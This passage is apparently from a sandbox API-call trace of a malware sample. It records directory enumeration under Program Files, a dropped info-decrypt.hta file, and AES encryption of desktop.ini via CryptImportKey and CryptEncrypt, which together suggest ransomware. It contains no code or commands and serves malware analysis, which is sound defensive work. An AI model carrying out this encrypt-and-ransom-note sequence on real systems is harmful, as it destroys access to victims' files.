dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0131.995] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.995] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe69b6600, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe69b6600, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0131.996] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd23a40, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0131.996] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe658bf80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe658bf80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0132.000] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe6565e20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6565e20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0132.000] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe65b20e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe65b20e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0132.001] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe0aa5760, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0aa5760, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0132.001] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe590cc00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe590cc00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0132.001] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe0acb8c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0acb8c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0132.001] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe0a0d1e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0a0d1e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0132.001] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe2aa1f00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2aa1f00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0132.001] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0132.001] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0132.001] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0132.002] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6b7f680, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6b7f680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0132.002] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0132.002] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe0aa5760, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0aa5760, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0132.002] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe69904a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe69904a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0132.002] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe0af1a20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0af1a20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0132.002] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe658bf80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe658bf80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0132.002] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.003] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ef4c) returned 1 [0132.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ef58) returned 1 [0132.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6d8ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0132.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8ea08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\info-decrypt.hta", lpFilePart=0x0) returned 0x21 [0132.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee68) returned 1 [0132.003] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\info-decrypt.hta" (normalized: "c:\\program files\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8eee4 | out: lpFileInformation=0x6d8eee4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0132.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee64) returned 1 [0132.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6d8ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0132.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\info-decrypt.hta", lpFilePart=0x0) returned 0x21 [0132.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed9c) returned 1 [0132.003] CreateFileW (lpFileName="C:\\Program Files\\info-decrypt.hta" (normalized: "c:\\program files\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x550 [0132.004] GetFileType (hFile=0x550) returned 0x1 [0132.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed98) returned 1 [0132.004] GetFileType (hFile=0x550) returned 0x1 [0132.004] WriteFile (in: hFile=0x550, lpBuffer=0x38cb3e4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6d8ee60, lpOverlapped=0x0 | out: lpBuffer=0x38cb3e4*, lpNumberOfBytesWritten=0x6d8ee60*=0x1000, lpOverlapped=0x0) returned 1 [0132.022] WriteFile (in: hFile=0x550, lpBuffer=0x38cb3e4*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6d8ee34, lpOverlapped=0x0 | out: lpBuffer=0x38cb3e4*, lpNumberOfBytesWritten=0x6d8ee34*=0x55e, lpOverlapped=0x0) returned 1 [0132.022] CloseHandle (hObject=0x550) returned 1 [0132.023] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6d8ea08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0132.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8eeb4) returned 1 [0132.023] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x38cc400 | out: lpFileInformation=0x38cc400*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0132.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eeb0) returned 1 [0132.023] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6d8e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0132.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ede8) returned 1 [0132.023] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x550 [0132.023] GetFileType (hFile=0x550) returned 0x1 [0132.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ede4) returned 1 [0132.023] GetFileType (hFile=0x550) returned 0x1 [0132.023] GetFileSize (in: hFile=0x550, lpFileSizeHigh=0x6d8eef0 | out: lpFileSizeHigh=0x6d8eef0*=0x0) returned 0xae [0132.023] ReadFile (in: hFile=0x550, lpBuffer=0x38cc624, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6d8ee9c, lpOverlapped=0x0 | out: lpBuffer=0x38cc624*, lpNumberOfBytesRead=0x6d8ee9c*=0xae, lpOverlapped=0x0) returned 1 [0132.024] CloseHandle (hObject=0x550) returned 1 [0135.716] CryptAcquireContextW (in: phProv=0x6d8ee3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ee3c*=0xbe08b0) returned 1 [0137.594] CryptGenRandom (in: hProv=0xbe08b0, dwLen=0x10, pbBuffer=0x3786668 | out: pbBuffer=0x3786668) returned 1 [0141.474] CryptImportKey (in: hProv=0xbe08b0, pbData=0x3737f90, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ee0c | out: phKey=0x6d8ee0c*=0xb7f550) returned 1 [0141.474] CryptContextAddRef (hProv=0xbe08b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.474] CryptContextAddRef (hProv=0xbe08b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.474] CryptDuplicateKey (in: hKey=0xb7f550, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8edfc | out: phKey=0x6d8edfc*=0xb7f590) returned 1 [0141.474] CryptContextAddRef (hProv=0xbe08b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.474] CryptSetKeyParam (hKey=0xb7f590, dwParam=0x4, pbData=0x3738070*=0x1, dwFlags=0x0) returned 1 [0141.474] CryptSetKeyParam (hKey=0xb7f590, dwParam=0x1, pbData=0x373803c, dwFlags=0x0) returned 1 [0141.474] CryptEncrypt (in: hKey=0xb7f590, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3738080*, pdwDataLen=0x6d8ee68*=0xb0, dwBufLen=0xb0 | out: pbData=0x3738080*, pdwDataLen=0x6d8ee68*=0xb0) returned 1 [0141.475] CryptEncrypt (in: hKey=0xb7f590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3738154*, pdwDataLen=0x6d8ee70*=0x0, dwBufLen=0x10 | out: pbData=0x3738154*, pdwDataLen=0x6d8ee70*=0x10) returned 1 [0141.476] CryptDestroyKey (hKey=0xb7f550) returned 1 [0141.476] CryptReleaseContext (hProv=0xbe08b0, dwFlags=0x0) returned 1 [0141.476] CryptReleaseContext (hProv=0xbe08b0, dwFlags=0x0) returned 1 [0141.476] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6d8e8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0141.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edd4) returned 1 [0141.476] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0141.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8dc10) returned 1 [0141.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ef3c) returned 1 [0141.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files", nBufferLength=0x105, lpBuffer=0x6d8ea44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files", lpFilePart=0x0) returned 0x1d [0141.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\", nBufferLength=0x105, lpBuffer=0x6d8ea18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\", lpFilePart=0x0) returned 0x1e [0141.478] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x6d8ec64 | out: lpFindFileData=0x6d8ec64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f550 [0141.479] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.479] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0141.479] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0141.479] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0141.479] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0141.479] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0141.480] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0141.480] FindClose (in: hFindFile=0xb7f550 | out: hFindFile=0xb7f550) returned 1 [0141.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eefc) returned 1 [0141.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ef08) returned 1 [0141.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ef3c) returned 1 [0141.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files", nBufferLength=0x105, lpBuffer=0x6d8ea44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files", lpFilePart=0x0) returned 0x1d [0141.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\", nBufferLength=0x105, lpBuffer=0x6d8ea18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\", lpFilePart=0x0) returned 0x1e [0141.480] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x6d8ec64 | out: lpFindFileData=0x6d8ec64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f550 [0141.480] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: 